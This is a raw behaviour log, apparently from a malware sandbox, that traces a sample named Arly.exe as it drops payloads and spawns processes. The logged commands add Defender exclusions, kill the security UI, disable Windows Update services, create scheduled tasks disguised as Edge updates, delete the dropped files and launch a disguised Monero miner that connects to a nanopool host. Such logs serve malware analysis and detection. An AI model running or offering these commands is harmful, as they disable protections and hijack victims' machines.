                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecHealthUI.exe")
                              Source: C:\Users\user\Desktop\Arly.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: wxrctnzmvurnezy.exeString found in binary or memory: --start-minimizedhttp://localhost:/json
                              Source: C:\Users\user\Desktop\Arly.exeFile read: C:\Users\user\Desktop\Arly.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Arly.exe "C:\Users\user\Desktop\Arly.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                              Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                              Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                              Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                              Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe"
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 2132 -ip 2132
                              Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2132 -s 136
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe"
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 2132 -ip 2132
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2132 -s 136
                              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
